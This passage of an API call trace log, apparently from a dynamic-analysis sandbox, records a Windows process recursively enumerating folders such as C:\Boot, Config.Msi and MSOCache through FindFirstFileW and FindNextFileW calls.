dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.160] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.160] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.160] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.160] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.160] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0033.160] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.160] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.160] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.160] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.160] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.161] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.161] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0033.161] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.161] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.297] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.297] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.297] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.297] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.297] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0033.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.298] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.298] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.298] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.298] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.298] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.298] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0033.299] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.299] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.888] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.888] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.889] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.889] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.889] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0033.889] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.889] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.889] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.889] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.889] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.889] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.889] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0033.889] FindClose (in: hFindFile=0x628500 | out: hFindFile=0x628500) returned 1 [0033.889] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3780268 | out: hHeap=0x5d0000) returned 1 [0033.889] FindNextFileW (in: hFindFile=0x65e210, lpFindFileData=0x2f2fd00 | out: lpFindFileData=0x2f2fd00*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0033.890] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3780268 [0033.890] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x628500 [0033.890] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.890] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0033.890] FindClose (in: hFindFile=0x628500 | out: hFindFile=0x628500) returned 1 [0033.890] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3780268 | out: hHeap=0x5d0000) returned 1 [0033.890] FindNextFileW (in: hFindFile=0x65e210, lpFindFileData=0x2f2fd00 | out: lpFindFileData=0x2f2fd00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0033.890] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3780268 [0033.890] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="\xddf8\x61\x16")) returned 0xffffffff [0033.891] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3780268 | out: hHeap=0x5d0000) returned 1 [0033.891] FindNextFileW (in: hFindFile=0x65e210, lpFindFileData=0x2f2fd00 | out: lpFindFileData=0x2f2fd00*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0033.891] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3780268 [0033.891] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x628500 [0033.891] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.891] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0033.892] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.892] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0034.050] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.053] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0034.053] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x37a0278 [0034.060] FindNextFileW (in: hFindFile=0x62a590, lpFindFileData=0x2f2f58c | out: lpFindFileData=0x2f2f58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.060] FindNextFileW (in: hFindFile=0x62a590, lpFindFileData=0x2f2f58c | out: lpFindFileData=0x2f2f58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0034.809] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.809] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0035.899] FindNextFileW (in: hFindFile=0x6c40a8, lpFindFileData=0x2f2f310 | out: lpFindFileData=0x2f2f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.901] FindNextFileW (in: hFindFile=0x6c40a8, lpFindFileData=0x2f2f310 | out: lpFindFileData=0x2f2f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f65090 [0035.901] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common 